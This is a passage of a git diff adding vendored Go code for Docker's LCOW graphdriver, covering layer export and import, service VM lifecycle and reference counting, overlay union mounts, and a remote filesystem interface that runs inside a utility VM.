+	svm, err := d.startServiceVMIfNotRunning(id, []hcsshim.MappedVirtualDisk{mvd}, fmt.Sprintf("diff %s", id))
+	if err != nil {
+		return nil, err
+	}
+
+	logrus.Debugf("lcowdriver: diff: waiting for svm to finish booting")
+	err = svm.getStartError()
+	if err != nil {
+		d.terminateServiceVM(id, fmt.Sprintf("diff %s", id), false)
+		return nil, fmt.Errorf("lcowdriver: diff: svm failed to boot: %s", err)
+	}
+
+	// Obtain the tar stream for it
+	logrus.Debugf("%s: %s %s, size %d, ReadOnly %t", title, ld.filename, mvd.ContainerPath, ld.size, ld.isSandbox)
+	tarReadCloser, err := svm.config.VhdToTar(mvd.HostPath, mvd.ContainerPath, ld.isSandbox, ld.size)
+	if err != nil {
+		svm.hotRemoveVHDs(mvd)
+		d.terminateServiceVM(id, fmt.Sprintf("diff %s", id), false)
+		return nil, fmt.Errorf("%s failed to export layer to tar stream for id: %s, parent: %s : %s", title, id, parent, err)
+	}
+
+	logrus.Debugf("%s id %s parent %s completed successfully", title, id, parent)
+
+	// In safe/non-global mode, we can't tear down the service VM until things have been read.
+	return ioutils.NewReadCloserWrapper(tarReadCloser, func() error {
+		tarReadCloser.Close()
+		svm.hotRemoveVHDs(mvd)
+		d.terminateServiceVM(id, fmt.Sprintf("diff %s", id), false)
+		return nil
+	}), nil
+}
+
+// ApplyDiff extracts the changeset from the given diff into the
+// layer with the specified id and parent, returning the size of the
+// new layer in bytes. The layer should not be mounted when calling
+// this function. Another way of describing this is that ApplyDiff writes
+// to a new layer (a VHD in LCOW) the contents of a tarstream it's given.
+func (d *Driver) ApplyDiff(id, parent string, diff io.Reader) (int64, error) {
+	logrus.Debugf("lcowdriver: applydiff: id %s", id)
+
+	svm, err := d.startServiceVMIfNotRunning(id, nil, fmt.Sprintf("applydiff %s", id))
+	if err != nil {
+		return 0, err
+	}
+	defer d.terminateServiceVM(id, fmt.Sprintf("applydiff %s", id), false)
+
+	logrus.Debugf("lcowdriver: applydiff: waiting for svm to finish booting")
+	err = svm.getStartError()
+	if err != nil {
+		return 0, fmt.Errorf("lcowdriver: applydiff: svm failed to boot: %s", err)
+	}
+
+	// TODO @jhowardmsft - the retries are temporary to overcome platform reliability issues.
+	// Obviously this will be removed as platform bugs are fixed.
+	retries := 0
+	for {
+		retries++
+		size, err := svm.config.TarToVhd(filepath.Join(d.dataRoot, id, layerFilename), diff)
+		if err != nil {
+			if retries <= 10 {
+				continue
+			}
+			return 0, err
+		}
+		return size, err
+	}
+}
+
+// Changes produces a list of changes between the specified layer
+// and its parent layer. If parent is "", then all changes will be ADD changes.
+// The layer should not be mounted when calling this function.
+func (d *Driver) Changes(id, parent string) ([]archive.Change, error) {
+	logrus.Debugf("lcowdriver: changes: id %s parent %s", id, parent)
+	// TODO @gupta-ak. Needs implementation with assistance from service VM
+	return nil, nil
+}
+
+// DiffSize calculates the changes between the specified layer
+// and its parent and returns the size in bytes of the changes
+// relative to its base filesystem directory.
+func (d *Driver) DiffSize(id, parent string) (size int64, err error) {
+	logrus.Debugf("lcowdriver: diffsize: id %s", id)
+	// TODO @gupta-ak. Needs implementation with assistance from service VM
+	return 0, nil
+}
+
+// GetMetadata returns custom driver information.
+func (d *Driver) GetMetadata(id string) (map[string]string, error) {
+	logrus.Debugf("lcowdriver: getmetadata: id %s", id)
+	m := make(map[string]string)
+	m["dir"] = d.dir(id)
+	return m, nil
+}
+
+// GetLayerPath gets the layer path on host (path to VHD/VHDX)
+func (d *Driver) GetLayerPath(id string) (string, error) {
+	return d.dir(id), nil
+}
+
+// dir returns the absolute path to the layer.
+func (d *Driver) dir(id string) string {
+	return filepath.Join(d.dataRoot, filepath.Base(id))
+}
+
+// getLayerChain returns the layer chain information.
+func (d *Driver) getLayerChain(id string) ([]string, error) {
+	jPath := filepath.Join(d.dir(id), "layerchain.json")
+	logrus.Debugf("lcowdriver: getlayerchain: id %s json %s", id, jPath)
+	content, err := ioutil.ReadFile(jPath)
+	if os.IsNotExist(err) {
+		return nil, nil
+	} else if err != nil {
+		return nil, fmt.Errorf("lcowdriver: getlayerchain: %s unable to read layerchain file %s: %s", id, jPath, err)
+	}
+
+	var layerChain []string
+	err = json.Unmarshal(content, &layerChain)
+	if err != nil {
+		return nil, fmt.Errorf("lcowdriver: getlayerchain: %s failed to unmarshall layerchain file %s: %s", id, jPath, err)
+	}
+	return layerChain, nil
+}
+
+// setLayerChain stores the layer chain information on disk.
+func (d *Driver) setLayerChain(id string, chain []string) error {
+	content, err := json.Marshal(&chain)
+	if err != nil {
+		return fmt.Errorf("lcowdriver: setlayerchain: %s failed to marshall layerchain json: %s", id, err)
+	}
+
+	jPath := filepath.Join(d.dir(id), "layerchain.json")
+	logrus.Debugf("lcowdriver: setlayerchain: id %s json %s", id, jPath)
+	err = ioutil.WriteFile(jPath, content, 0600)
+	if err != nil {
+		return fmt.Errorf("lcowdriver: setlayerchain: %s failed to write layerchain file: %s", id, err)
+	}
+	return nil
+}
+
+// getLayerDetails is a utility for getting a file name, size and indication of
+// sandbox for a VHD(x) in a folder. A read-only layer will be layer.vhd. A
+// read-write layer will be sandbox.vhdx.
+func getLayerDetails(folder string) (*layerDetails, error) {
+	var fileInfo os.FileInfo
+	ld := &layerDetails{
+		isSandbox: false,
+		filename:  filepath.Join(folder, layerFilename),
+	}
+
+	fileInfo, err := os.Stat(ld.filename)
+	if err != nil {
+		ld.filename = filepath.Join(folder, sandboxFilename)
+		if fileInfo, err = os.Stat(ld.filename); err != nil {
+			return nil, fmt.Errorf("failed to locate layer or sandbox in %s", folder)
+		}
+		ld.isSandbox = true
+	}
+	ld.size = fileInfo.Size()
+
+	return ld, nil
+}
+
+func (d *Driver) getAllMounts(id string) ([]hcsshim.MappedVirtualDisk, error) {
+	layerChain, err := d.getLayerChain(id)
+	if err != nil {
+		return nil, err
+	}
+	layerChain = append([]string{d.dir(id)}, layerChain...)
+
+	logrus.Debugf("getting all  layers: %v", layerChain)
+	disks := make([]hcsshim.MappedVirtualDisk, len(layerChain), len(layerChain))
+	for i := range layerChain {
+		ld, err := getLayerDetails(layerChain[i])
+		if err != nil {
+			logrus.Debugf("Failed to get LayerVhdDetails from %s: %s", layerChain[i], err)
+			return nil, err
+		}
+		disks[i].HostPath = ld.filename
+		disks[i].ContainerPath = hostToGuest(ld.filename)
+		disks[i].CreateInUtilityVM = true
+		disks[i].ReadOnly = !ld.isSandbox
+	}
+	return disks, nil
+}
+
+func hostToGuest(hostpath string) string {
+	return fmt.Sprintf("/tmp/%s", filepath.Base(filepath.Dir(hostpath)))
+}
+
+func unionMountName(disks []hcsshim.MappedVirtualDisk) string {
+	return fmt.Sprintf("%s-mount", disks[0].ContainerPath)
+}
+
+type nopCloser struct {
+	io.Reader
+}
+
+func (nopCloser) Close() error {
+	return nil
+}
+
+type fileGetCloserFromSVM struct {
+	id  string
+	svm *serviceVM
+	mvd *hcsshim.MappedVirtualDisk
+	d   *Driver
+}
+
+func (fgc *fileGetCloserFromSVM) Close() error {
+	if fgc.svm != nil {
+		if fgc.mvd != nil {
+			if err := fgc.svm.hotRemoveVHDs(*fgc.mvd); err != nil {
+				// We just log this as we're going to tear down the SVM imminently unless in global mode
+				logrus.Errorf("failed to remove mvd %s: %s", fgc.mvd.ContainerPath, err)
+			}
+		}
+	}
+	if fgc.d != nil && fgc.svm != nil && fgc.id != "" {
+		if err := fgc.d.terminateServiceVM(fgc.id, fmt.Sprintf("diffgetter %s", fgc.id), false); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func (fgc *fileGetCloserFromSVM) Get(filename string) (io.ReadCloser, error) {
+	errOut := &bytes.Buffer{}
+	outOut := &bytes.Buffer{}
+	file := path.Join(fgc.mvd.ContainerPath, filename)
+	if err := fgc.svm.runProcess(fmt.Sprintf("cat %s", file), nil, outOut, errOut); err != nil {
+		logrus.Debugf("cat %s failed: %s", file, errOut.String())
+		return nil, err
+	}
+	return nopCloser{bytes.NewReader(outOut.Bytes())}, nil
+}
+
+// DiffGetter returns a FileGetCloser that can read files from the directory that
+// contains files for the layer differences. Used for direct access for tar-split.
+func (d *Driver) DiffGetter(id string) (graphdriver.FileGetCloser, error) {
+	title := fmt.Sprintf("lcowdriver: diffgetter: %s", id)
+	logrus.Debugf(title)
+
+	ld, err := getLayerDetails(d.dir(id))
+	if err != nil {
+		logrus.Debugf("%s: failed to get vhdx information of %s: %s", title, d.dir(id), err)
+		return nil, err
+	}
+
+	// Start the SVM with a mapped virtual disk. Note that if the SVM is
+	// already running and we are in global mode, this will be hot-added.
+	mvd := hcsshim.MappedVirtualDisk{
+		HostPath:          ld.filename,
+		ContainerPath:     hostToGuest(ld.filename),
+		CreateInUtilityVM: true,
+		ReadOnly:          true,
+	}
+
+	logrus.Debugf("%s: starting service VM", title)
+	svm, err := d.startServiceVMIfNotRunning(id, []hcsshim.MappedVirtualDisk{mvd}, fmt.Sprintf("diffgetter %s", id))
+	if err != nil {
+		return nil, err
+	}
+
+	logrus.Debugf("%s: waiting for svm to finish booting", title)
+	err = svm.getStartError()
+	if err != nil {
+		d.terminateServiceVM(id, fmt.Sprintf("diff %s", id), false)
+		return nil, fmt.Errorf("%s: svm failed to boot: %s", title, err)
+	}
+
+	return &fileGetCloserFromSVM{
+		id:  id,
+		svm: svm,
+		mvd: &mvd,
+		d:   d}, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow_svm.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow_svm.go
new file mode 100644
index 0000000000..9a27ac9496
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow_svm.go
@@ -0,0 +1,378 @@
+// +build windows
+
+package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow"
+
+import (
+	"errors"
+	"fmt"
+	"io"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/Microsoft/hcsshim"
+	"github.com/Microsoft/opengcs/client"
+	"github.com/sirupsen/logrus"
+)
+
+// Code for all the service VM management for the LCOW graphdriver
+
+var errVMisTerminating = errors.New("service VM is shutting down")
+var errVMUnknown = errors.New("service vm id is unknown")
+var errVMStillHasReference = errors.New("Attemping to delete a VM that is still being used")
+
+// serviceVMMap is the struct representing the id -> service VM mapping.
+type serviceVMMap struct {
+	sync.Mutex
+	svms map[string]*serviceVMMapItem
+}
+
+// serviceVMMapItem is our internal structure representing an item in our
+// map of service VMs we are maintaining.
+type serviceVMMapItem struct {
+	svm      *serviceVM // actual service vm object
+	refCount int        // refcount for VM
+}
+
+type serviceVM struct {
+	sync.Mutex                     // Serialises operations being performed in this service VM.
+	scratchAttached bool           // Has a scratch been attached?
+	config          *client.Config // Represents the service VM item.
+
+	// Indicates that the vm is started
+	startStatus chan interface{}
+	startError  error
+
+	// Indicates that the vm is stopped
+	stopStatus chan interface{}
+	stopError  error
+
+	attachedVHDs map[string]int // Map ref counting all the VHDS we've hot-added/hot-removed.
+	unionMounts  map[string]int // Map ref counting all the union filesystems we mounted.
+}
+
+// add will add an id to the service vm map. There are three cases:
+// 	- entry doesn't exist:
+// 		- add id to map and return a new vm that the caller can manually configure+start
+//	- entry does exist
+//  	- return vm in map and increment ref count
+//  - entry does exist but the ref count is 0
+//		- return the svm and errVMisTerminating. Caller can call svm.getStopError() to wait for stop
+func (svmMap *serviceVMMap) add(id string) (svm *serviceVM, alreadyExists bool, err error) {
+	svmMap.Lock()
+	defer svmMap.Unlock()
+	if svm, ok := svmMap.svms[id]; ok {
+		if svm.refCount == 0 {
+			return svm.svm, true, errVMisTerminating
+		}
+		svm.refCount++
+		return svm.svm, true, nil
+	}
+
+	// Doesn't exist, so create an empty svm to put into map and return
+	newSVM := &serviceVM{
+		startStatus:  make(chan interface{}),
+		stopStatus:   make(chan interface{}),
+		attachedVHDs: make(map[string]int),
+		unionMounts:  make(map[string]int),
+		config:       &client.Config{},
+	}
+	svmMap.svms[id] = &serviceVMMapItem{
+		svm:      newSVM,
+		refCount: 1,
+	}
+	return newSVM, false, nil
+}
+
+// get will get the service vm from the map. There are three cases:
+// 	- entry doesn't exist:
+// 		- return errVMUnknown
+//	- entry does exist
+//  	- return vm with no error
+//  - entry does exist but the ref count is 0
+//		- return the svm and errVMisTerminating. Caller can call svm.getStopError() to wait for stop
+func (svmMap *serviceVMMap) get(id string) (*serviceVM, error) {
+	svmMap.Lock()
+	defer svmMap.Unlock()
+	svm, ok := svmMap.svms[id]
+	if !ok {
+		return nil, errVMUnknown
+	}
+	if svm.refCount == 0 {
+		return svm.svm, errVMisTerminating
+	}
+	return svm.svm, nil
+}
+
+// decrementRefCount decrements the ref count of the given ID from the map. There are four cases:
+// 	- entry doesn't exist:
+// 		- return errVMUnknown
+//  - entry does exist but the ref count is 0
+//		- return the svm and errVMisTerminating. Caller can call svm.getStopError() to wait for stop
+//	- entry does exist but ref count is 1
+//  	- return vm and set lastRef to true. The caller can then stop the vm, delete the id from this map
+//      - and execute svm.signalStopFinished to signal the threads that the svm has been terminated.
+//	- entry does exist and ref count > 1
+//		- just reduce ref count and return svm
+func (svmMap *serviceVMMap) decrementRefCount(id string) (_ *serviceVM, lastRef bool, _ error) {
+	svmMap.Lock()
+	defer svmMap.Unlock()
+
+	svm, ok := svmMap.svms[id]
+	if !ok {
+		return nil, false, errVMUnknown
+	}
+	if svm.refCount == 0 {
+		return svm.svm, false, errVMisTerminating
+	}
+	svm.refCount--
+	return svm.svm, svm.refCount == 0, nil
+}
+
+// setRefCountZero works the same way as decrementRefCount, but sets ref count to 0 instead of decrementing it.
+func (svmMap *serviceVMMap) setRefCountZero(id string) (*serviceVM, error) {
+	svmMap.Lock()
+	defer svmMap.Unlock()
+
+	svm, ok := svmMap.svms[id]
+	if !ok {
+		return nil, errVMUnknown
+	}
+	if svm.refCount == 0 {
+		return svm.svm, errVMisTerminating
+	}
+	svm.refCount = 0
+	return svm.svm, nil
+}
+
+// deleteID deletes the given ID from the map. If the refcount is not 0 or the
+// VM does not exist, then this function returns an error.
+func (svmMap *serviceVMMap) deleteID(id string) error {
+	svmMap.Lock()
+	defer svmMap.Unlock()
+	svm, ok := svmMap.svms[id]
+	if !ok {
+		return errVMUnknown
+	}
+	if svm.refCount != 0 {
+		return errVMStillHasReference
+	}
+	delete(svmMap.svms, id)
+	return nil
+}
+
+func (svm *serviceVM) signalStartFinished(err error) {
+	svm.Lock()
+	svm.startError = err
+	svm.Unlock()
+	close(svm.startStatus)
+}
+
+func (svm *serviceVM) getStartError() error {
+	<-svm.startStatus
+	svm.Lock()
+	defer svm.Unlock()
+	return svm.startError
+}
+
+func (svm *serviceVM) signalStopFinished(err error) {
+	svm.Lock()
+	svm.stopError = err
+	svm.Unlock()
+	close(svm.stopStatus)
+}
+
+func (svm *serviceVM) getStopError() error {
+	<-svm.stopStatus
+	svm.Lock()
+	defer svm.Unlock()
+	return svm.stopError
+}
+
+// hotAddVHDs waits for the service vm to start and then attaches the vhds.
+func (svm *serviceVM) hotAddVHDs(mvds ...hcsshim.MappedVirtualDisk) error {
+	if err := svm.getStartError(); err != nil {
+		return err
+	}
+	return svm.hotAddVHDsAtStart(mvds...)
+}
+
+// hotAddVHDsAtStart works the same way as hotAddVHDs but does not wait for the VM to start.
+func (svm *serviceVM) hotAddVHDsAtStart(mvds ...hcsshim.MappedVirtualDisk) error {
+	svm.Lock()
+	defer svm.Unlock()
+	for i, mvd := range mvds {
+		if _, ok := svm.attachedVHDs[mvd.HostPath]; ok {
+			svm.attachedVHDs[mvd.HostPath]++
+			continue
+		}
+
+		if err := svm.config.HotAddVhd(mvd.HostPath, mvd.ContainerPath, mvd.ReadOnly, !mvd.AttachOnly); err != nil {
+			svm.hotRemoveVHDsNoLock(mvds[:i]...)
+			return err
+		}
+		svm.attachedVHDs[mvd.HostPath] = 1
+	}
+	return nil
+}
+
+// hotRemoveVHDs waits for the service vm to start and then removes the vhds.
+// The service VM must not be locked when calling this function.
+func (svm *serviceVM) hotRemoveVHDs(mvds ...hcsshim.MappedVirtualDisk) error {
+	if err := svm.getStartError(); err != nil {
+		return err
+	}
+	svm.Lock()
+	defer svm.Unlock()
+	return svm.hotRemoveVHDsNoLock(mvds...)
+}
+
+// hotRemoveVHDsNoLock removes VHDs from a service VM. When calling this function,
+// the contract is the service VM lock must be held.
+func (svm *serviceVM) hotRemoveVHDsNoLock(mvds ...hcsshim.MappedVirtualDisk) error {
+	var retErr error
+	for _, mvd := range mvds {
+		if _, ok := svm.attachedVHDs[mvd.HostPath]; !ok {
+			// We continue instead of returning an error if we try to hot remove a non-existent VHD.
+			// This is because one of the callers of the function is graphdriver.Put(). Since graphdriver.Get()
+			// defers the VM start to the first operation, it's possible that nothing have been hot-added
+			// when Put() is called. To avoid Put returning an error in that case, we simply continue if we
+			// don't find the vhd attached.
+			continue
+		}
+
+		if svm.attachedVHDs[mvd.HostPath] > 1 {
+			svm.attachedVHDs[mvd.HostPath]--
+			continue
+		}
+
+		// last VHD, so remove from VM and map
+		if err := svm.config.HotRemoveVhd(mvd.HostPath); err == nil {
+			delete(svm.attachedVHDs, mvd.HostPath)
+		} else {
+			// Take note of the error, but still continue to remove the other VHDs
+			logrus.Warnf("Failed to hot remove %s: %s", mvd.HostPath, err)
+			if retErr == nil {
+				retErr = err
+			}
+		}
+	}
+	return retErr
+}
+
+func (svm *serviceVM) createExt4VHDX(destFile string, sizeGB uint32, cacheFile string) error {
+	if err := svm.getStartError(); err != nil {
+		return err
+	}
+
+	svm.Lock()
+	defer svm.Unlock()
+	return svm.config.CreateExt4Vhdx(destFile, sizeGB, cacheFile)
+}
+
+func (svm *serviceVM) createUnionMount(mountName string, mvds ...hcsshim.MappedVirtualDisk) (err error) {
+	if len(mvds) == 0 {
+		return fmt.Errorf("createUnionMount: error must have at least 1 layer")
+	}
+
+	if err = svm.getStartError(); err != nil {
+		return err
+	}
+
+	svm.Lock()
+	defer svm.Unlock()
+	if _, ok := svm.unionMounts[mountName]; ok {
+		svm.unionMounts[mountName]++
+		return nil
+	}
+
+	var lowerLayers []string
+	if mvds[0].ReadOnly {
+		lowerLayers = append(lowerLayers, mvds[0].ContainerPath)
+	}
+
+	for i := 1; i < len(mvds); i++ {
+		lowerLayers = append(lowerLayers, mvds[i].ContainerPath)
+	}
+
+	logrus.Debugf("Doing the overlay mount with union directory=%s", mountName)
+	if err = svm.runProcess(fmt.Sprintf("mkdir -p %s", mountName), nil, nil, nil); err != nil {
+		return err
+	}
+
+	var cmd string
+	if len(mvds) == 1 {
+		// `FROM SCRATCH` case and the only layer. No overlay required.
+		cmd = fmt.Sprintf("mount %s %s", mvds[0].ContainerPath, mountName)
+	} else if mvds[0].ReadOnly {
+		// Readonly overlay
+		cmd = fmt.Sprintf("mount -t overlay overlay -olowerdir=%s %s",
+			strings.Join(lowerLayers, ","),
+			mountName)
+	} else {
+		upper := fmt.Sprintf("%s/upper", mvds[0].ContainerPath)
+		work := fmt.Sprintf("%s/work", mvds[0].ContainerPath)
+
+		if err = svm.runProcess(fmt.Sprintf("mkdir -p %s %s", upper, work), nil, nil, nil); err != nil {
+			return err
+		}
+
+		cmd = fmt.Sprintf("mount -t overlay overlay -olowerdir=%s,upperdir=%s,workdir=%s %s",
+			strings.Join(lowerLayers, ":"),
+			upper,
+			work,
+			mountName)
+	}
+
+	logrus.Debugf("createUnionMount: Executing mount=%s", cmd)
+	if err = svm.runProcess(cmd, nil, nil, nil); err != nil {
+		return err
+	}
+
+	svm.unionMounts[mountName] = 1
+	return nil
+}
+
+func (svm *serviceVM) deleteUnionMount(mountName string, disks ...hcsshim.MappedVirtualDisk) error {
+	if err := svm.getStartError(); err != nil {
+		return err
+	}
+
+	svm.Lock()
+	defer svm.Unlock()
+	if _, ok := svm.unionMounts[mountName]; !ok {
+		return nil
+	}
+
+	if svm.unionMounts[mountName] > 1 {
+		svm.unionMounts[mountName]--
+		return nil
+	}
+
+	logrus.Debugf("Removing union mount %s", mountName)
+	if err := svm.runProcess(fmt.Sprintf("umount %s", mountName), nil, nil, nil); err != nil {
+		return err
+	}
+
+	delete(svm.unionMounts, mountName)
+	return nil
+}
+
+func (svm *serviceVM) runProcess(command string, stdin io.Reader, stdout io.Writer, stderr io.Writer) error {
+	process, err := svm.config.RunProcess(command, stdin, stdout, stderr)
+	if err != nil {
+		return err
+	}
+	defer process.Close()
+
+	process.WaitTimeout(time.Duration(int(time.Second) * svm.config.UvmTimeoutSeconds))
+	exitCode, err := process.ExitCode()
+	if err != nil {
+		return err
+	}
+
+	if exitCode != 0 {
+		return fmt.Errorf("svm.runProcess: command %s failed with exit code %d", command, exitCode)
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs.go
new file mode 100644
index 0000000000..29f15fd24c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs.go
@@ -0,0 +1,139 @@
+// +build windows
+
+package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow"
+
+import (
+	"bytes"
+	"fmt"
+	"io"
+	"runtime"
+	"strings"
+	"sync"
+
+	"github.com/Microsoft/hcsshim"
+	"github.com/Microsoft/opengcs/service/gcsutils/remotefs"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/containerfs"
+	"github.com/sirupsen/logrus"
+)
+
+type lcowfs struct {
+	root        string
+	d           *Driver
+	mappedDisks []hcsshim.MappedVirtualDisk
+	vmID        string
+	currentSVM  *serviceVM
+	sync.Mutex
+}
+
+var _ containerfs.ContainerFS = &lcowfs{}
+
+// ErrNotSupported is an error for unsupported operations in the remotefs
+var ErrNotSupported = fmt.Errorf("not supported")
+
+// Functions to implement the ContainerFS interface
+func (l *lcowfs) Path() string {
+	return l.root
+}
+
+func (l *lcowfs) ResolveScopedPath(path string, rawPath bool) (string, error) {
+	logrus.Debugf("remotefs.resolvescopedpath inputs: %s %s ", path, l.root)
+
+	arg1 := l.Join(l.root, path)
+	if !rawPath {
+		// The l.Join("/", path) will make path an absolute path and then clean it
+		// so if path = ../../X, it will become /X.
+		arg1 = l.Join(l.root, l.Join("/", path))
+	}
+	arg2 := l.root
+
+	output := &bytes.Buffer{}
+	if err := l.runRemoteFSProcess(nil, output, remotefs.ResolvePathCmd, arg1, arg2); err != nil {
+		return "", err
+	}
+
+	logrus.Debugf("remotefs.resolvescopedpath success. Output: %s\n", output.String())
+	return output.String(), nil
+}
+
+func (l *lcowfs) OS() string {
+	return "linux"
+}
+
+func (l *lcowfs) Architecture() string {
+	return runtime.GOARCH
+}
+
+// Other functions that are used by docker like the daemon Archiver/Extractor
+func (l *lcowfs) ExtractArchive(src io.Reader, dst string, opts *archive.TarOptions) error {
+	logrus.Debugf("remotefs.ExtractArchve inputs: %s %+v", dst, opts)
+
+	tarBuf := &bytes.Buffer{}
+	if err := remotefs.WriteTarOptions(tarBuf, opts); err != nil {
+		return fmt.Errorf("failed to marshall tar opts: %s", err)
+	}
+
+	input := io.MultiReader(tarBuf, src)
+	if err := l.runRemoteFSProcess(input, nil, remotefs.ExtractArchiveCmd, dst); err != nil {
+		return fmt.Errorf("failed to extract archive to %s: %s", dst, err)
+	}
+	return nil
+}
+
+func (l *lcowfs) ArchivePath(src string, opts *archive.TarOptions) (io.ReadCloser, error) {
+	logrus.Debugf("remotefs.ArchivePath: %s %+v", src, opts)
+
+	tarBuf := &bytes.Buffer{}
+	if err := remotefs.WriteTarOptions(tarBuf, opts); err != nil {
+		return nil, fmt.Errorf("failed to marshall tar opts: %s", err)
+	}
+
+	r, w := io.Pipe()
+	go func() {
+		defer w.Close()
+		if err := l.runRemoteFSProcess(tarBuf, w, remotefs.ArchivePathCmd, src); err != nil {
+			logrus.Debugf("REMOTEFS: Failed to extract archive: %s %+v %s", src, opts, err)
+		}
+	}()
+	return r, nil
+}
+
+// Helper functions
+func (l *lcowfs) startVM() error {
+	l.Lock()
+	defer l.Unlock()
+	if l.currentSVM != nil {
+		return nil
+	}
+
+	svm, err := l.d.startServiceVMIfNotRunning(l.vmID, l.mappedDisks, fmt.Sprintf("lcowfs.startVM"))
+	if err != nil {
+		return err
+	}
+
+	if err = svm.createUnionMount(l.root, l.mappedDisks...); err != nil {
+		return err
+	}
+	l.currentSVM = svm
+	return nil
+}
+
+func (l *lcowfs) runRemoteFSProcess(stdin io.Reader, stdout io.Writer, args ...string) error {
+	if err := l.startVM(); err != nil {
+		return err
+	}
+
+	// Append remotefs prefix and setup as a command line string
+	cmd := fmt.Sprintf("%s %s", remotefs.RemotefsCmd, strings.Join(args, " "))
+	stderr := &bytes.Buffer{}
+	if err := l.currentSVM.runProcess(cmd, stdin, stdout, stderr); err != nil {
+		return err
+	}
+
+	eerr, err := remotefs.ReadError(stderr)
+	if eerr != nil {
+		// Process returned an error so return that.
+		return remotefs.ExportedToError(eerr)
+	}
+	return err
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_file.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_file.go
new file mode 100644
index 0000000000..1f00bfff46
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_file.go
@@ -0,0 +1,211 @@
+// +build windows
+
+package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow"
+
+import (
+	"bytes"
+	"encoding/binary"
+	"encoding/json"
+	"fmt"
+	"io"
+	"os"
+	"strconv"
+
+	"github.com/Microsoft/hcsshim"
+	"github.com/Microsoft/opengcs/service/gcsutils/remotefs"
+	"github.com/containerd/continuity/driver"
+)
+
+type lcowfile struct {
+	process   hcsshim.Process
+	stdin     io.WriteCloser
+	stdout    io.ReadCloser
+	stderr    io.ReadCloser
+	fs        *lcowfs
+	guestPath string
+}
+
+func (l *lcowfs) Open(path string) (driver.File, error) {
+	return l.OpenFile(path, os.O_RDONLY, 0)
+}
+
+func (l *lcowfs) OpenFile(path string, flag int, perm os.FileMode) (_ driver.File, err error) {
+	flagStr := strconv.FormatInt(int64(flag), 10)
+	permStr := strconv.FormatUint(uint64(perm), 8)
+
+	commandLine := fmt.Sprintf("%s %s %s %s %s", remotefs.RemotefsCmd, remotefs.OpenFileCmd, path, flagStr, permStr)
+	env := make(map[string]string)
+	env["PATH"] = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:"
+	processConfig := &hcsshim.ProcessConfig{
+		EmulateConsole:    false,
+		CreateStdInPipe:   true,
+		CreateStdOutPipe:  true,
+		CreateStdErrPipe:  true,
+		CreateInUtilityVm: true,
+		WorkingDirectory:  "/bin",
+		Environment:       env,
+		CommandLine:       commandLine,
+	}
+
+	process, err := l.currentSVM.config.Uvm.CreateProcess(processConfig)
+	if err != nil {
+		return nil, fmt.Errorf("failed to open file %s: %s", path, err)
+	}
+
+	stdin, stdout, stderr, err := process.Stdio()
+	if err != nil {
+		process.Kill()
+		process.Close()
+		return nil, fmt.Errorf("failed to open file pipes %s: %s", path, err)
+	}
+
+	lf := &lcowfile{
+		process:   process,
+		stdin:     stdin,
+		stdout:    stdout,
+		stderr:    stderr,
+		fs:        l,
+		guestPath: path,
+	}
+
+	if _, err := lf.getResponse(); err != nil {
+		return nil, fmt.Errorf("failed to open file %s: %s", path, err)
+	}
+	return lf, nil
+}
+
+func (l *lcowfile) Read(b []byte) (int, error) {
+	hdr := &remotefs.FileHeader{
+		Cmd:  remotefs.Read,
+		Size: uint64(len(b)),
+	}
+
+	if err := remotefs.WriteFileHeader(l.stdin, hdr, nil); err != nil {
+		return 0, err
+	}
+
+	buf, err := l.getResponse()
+	if err != nil {
+		return 0, err
+	}
+
+	n := copy(b, buf)
+	return n, nil
+}
+
+func (l *lcowfile) Write(b []byte) (int, error) {
+	hdr := &remotefs.FileHeader{
+		Cmd:  remotefs.Write,
+		Size: uint64(len(b)),
+	}
+
+	if err := remotefs.WriteFileHeader(l.stdin, hdr, b); err != nil {
+		return 0, err
+	}
+
+	_, err := l.getResponse()
+	if err != nil {
+		return 0, err
+	}
+
+	return len(b), nil
+}
+
+func (l *lcowfile) Seek(offset int64, whence int) (int64, error) {
+	seekHdr := &remotefs.SeekHeader{
+		Offset: offset,
+		Whence: int32(whence),
+	}
+
+	buf := &bytes.Buffer{}
+	if err := binary.Write(buf, binary.BigEndian, seekHdr); err != nil {
+		return 0, err
+	}
+
+	hdr := &remotefs.FileHeader{
+		Cmd:  remotefs.Write,
+		Size: uint64(buf.Len()),
+	}
+	if err := remotefs.WriteFileHeader(l.stdin, hdr, buf.Bytes()); err != nil {
+		return 0, err
+	}
+
+	resBuf, err := l.getResponse()
+	if err != nil {
+		return 0, err
+	}
+
+	var res int64
+	if err := binary.Read(bytes.NewBuffer(resBuf), binary.BigEndian, &res); err != nil {
+		return 0, err
+	}
+	return res, nil
+}
+
+func (l *lcowfile) Close() error {
+	hdr := &remotefs.FileHeader{
+		Cmd:  remotefs.Close,
+		Size: 0,
+	}
+
+	if err := remotefs.WriteFileHeader(l.stdin, hdr, nil); err != nil {
+		return err
+	}
+
+	_, err := l.getResponse()
+	return err
+}
+
+func (l *lcowfile) Readdir(n int) ([]os.FileInfo, error) {
+	nStr := strconv.FormatInt(int64(n), 10)
+
+	// Unlike the other File functions, this one can just be run without maintaining state,
+	// so just do the normal runRemoteFSProcess way.
+	buf := &bytes.Buffer{}
+	if err := l.fs.runRemoteFSProcess(nil, buf, remotefs.ReadDirCmd, l.guestPath, nStr); err != nil {
+		return nil, err
+	}
+
+	var info []remotefs.FileInfo
+	if err := json.Unmarshal(buf.Bytes(), &info); err != nil {
+		return nil, err
+	}
+
+	osInfo := make([]os.FileInfo, len(info))
+	for i := range info {
